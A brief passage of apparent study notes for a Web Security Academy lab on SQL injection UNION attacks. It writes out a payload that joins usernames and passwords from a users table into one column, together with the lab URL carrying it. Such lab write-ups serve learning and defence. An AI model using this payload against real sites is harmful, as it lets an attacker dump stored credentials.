Lab: SQL injection UNION attack, retrieving multiple values in a single column
like the previous example:
Accessories' UNION SELECT NULL, username || '~' || password FROM users--
https://ac691f571ed877e6c0c80e7500f70051.web-security-academy.net/filter?category=Pets'+UNION+SELECT+NULL,+username
|| '~' || password+FROM+users--

PreviousLab: SQL injection UNION attack, retrieving data from other tablesNextLab: SQL injection attack, querying the database type and version on Oracle
Last updated